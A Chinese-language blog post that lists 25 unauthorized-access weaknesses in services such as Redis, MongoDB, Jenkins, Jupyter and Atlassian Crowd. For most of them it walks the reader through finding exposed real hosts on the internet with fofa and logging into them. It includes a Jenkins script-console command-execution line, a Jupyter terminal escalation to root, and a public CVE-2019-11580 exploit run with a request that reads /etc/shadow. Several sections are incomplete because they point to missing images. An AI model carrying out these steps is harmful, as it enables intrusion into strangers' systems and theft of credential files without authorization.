未授权访问

未授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。日录遍历目前主要存在未授权访问漏洞的有:NFS 服务,Samba服务,LDAP,Rsync,FTPGitLab,Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...

一:Redis未授权访问漏洞 

1.在fofa上搜索 port="6379"找到一个具有未授权访问漏洞的网页(6379为默认的redis端口号)

2.在kali里安装redis 命令为:apt install redis

3.安装成功后输入redis-cli -h ip地址 -p 6379,进入后输入info显示成功

二:MongoDB未授权访问漏洞

1.因为mongoDB的默认端口为27017,我们直接在fofa上搜索 port="27017"(搜索端口号为27017的网站)

2.打开navicat进行连接连接名任意,主机填写找到的网址,点击测试连接,提示连接成功证明存在漏洞


三:Memcached未授权访问漏洞

Windows 下安装 Memcached | 菜鸟教程 (runoob.com)

1.解压好在此目录打开命令行

2.在命令行输入memcached.exe -d install、memcached.exe -d start

3.打开kali输入telnet 存在漏洞的ip 11211进行telnet侦测

4.输入stats,查看memcache服务状态

5.使用Nmap程序的脚本进行漏洞扫描,nmap -p 11211 --script memcached-info ip地址


四:Zookeeper未授权访问漏洞

1.使用fofa搜索端口号为2181的网站

这个环境搭建失败


五:Jenkins未授权访问漏洞

1.在fofa中搜索 port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

2.在打开的页面地址栏后加/manage/script/index.php进入

3.在其中输入println "'whoami".execute().text找到他的用户名


六:Jupyter NoteBook未授权访问漏洞

1.在fofa中搜索"Jupyter Notebook" && port="8888" && "terminals"

2.找到一个不需要密码的网站证明存在未授权访问漏洞,并且会直接跳到web管理界面

3.点击new-->termial新建一个终端

4.输入whomi、ls以及sudo su 进入root证明存在漏洞


七:Elasticsearch未授权访问漏洞

在fofa中使用图片中的语法进行搜索

然后对搜索到的地址进行访问且是不需要用户登录证明存在未授权漏洞

打开后可以查看一些节点信息


八:Kibana未授权访问漏洞

使用以下语句在fofa中进行搜索

然后查找地址不需要登陆的界面证明存在未授权漏洞


九:Docker Remote APl未授权访问漏洞


十:Kubernetes Api Server未授权访问漏洞

在fofa中使用以下语句进行搜索

在打开的网页中直接访问 8080 端口会返回可用的 API列表


十一:Hadoop未授权访问漏洞

在fofa中使用以下语句搜索

不需要账户登陆的页面进入证明存在未授权漏洞


十二:ActiveMQ未授权访问漏洞

在fofa中使用以下语句搜索环境

然后使用默认admin用户登录可进入证明存在未授权漏洞


十三:RabbitMQ未授权访问漏洞

使用以下语句搜索端口

然后使用游客用户登录账号密码guest

登陆进入证明存在未授权漏洞


十四:Springboot Actuator未授权访问漏洞

使用以下语句搜索网站

看到存在4xx或5xx的报错后可以确定web应用使用了springboot框架

然后拼接路径查看泄露数据/trace /env


十五:FTP未授权访问漏洞(匿名登陆)


十六:JBoss未授权访问漏洞

使用以下语句在fofa中进行搜索

找到一个welcome页面

拼接路径使用jmx-console

能进入就证明存在未授权漏洞


十七:Ldap未授权访问漏洞

首先下载ldapadmin工具

然后在fofa中输入以下语句搜索

打开工具在start处新建connections

在搜索结果中找到可以测试成功的地址

连接成功后进入文件内容证明存在未授权漏洞


十八:Rsync未授权访问漏洞

使用fofa搜索以下的语句

找到可以打开下级目录的地址

然后再查看其中的文件夹我们可以看到需要密码


十九:VNC未授权访问漏洞

使用fofa搜索以下语句

使用vnc链接验证我们可以看到有的地址需要密码,大家有能力的可以找几个不需要密码的


二十:Dubbo未授权访问漏洞

输入图片中在fofa中搜索

找到地址后使用kali输入telnet连接成功


二十一:NSF共享目录未授权访问

在fafo中搜索语句

然后我们需要在kali中安装nfs  apt install nfs-common

使用搜索到的IP地址可以看到共享目录

挂载相应目录到本地


二十二:Druid未授权访问漏洞

在fofa中搜索以下语句

进入站点后可以查看各种内部信息的证明存在未授权漏洞

也可以使用这些后缀进行拼接  /system/druid/websession.html
/webpage/system/druid/websession.html


二十三:Altassian Crowd未授权访问漏洞

漏洞利用脚本github地址:https://github.com/jas502n/CVE-2019-11580

1.git clone https://github.com/jas502n/CVE-2019-11580

2.cd CVE-2019-11580/ 

3.python CVE-2019-11580.py http://192.168.18.138:8095 

http://192.168.18.138:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow 


二十四:RTSP未授权访问漏洞

在fofa中搜索  (port="554") && (is_honeypot=false && is_fraud=false) && protocol="rtsp"

下载vlc 点击媒体-->打开网络串流

将找到的网址填入后点击播放

二十五:couchDB未授权访问漏洞

使用fofa搜索以下语句

使用kali执行未授权漏洞测试语句 curl

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值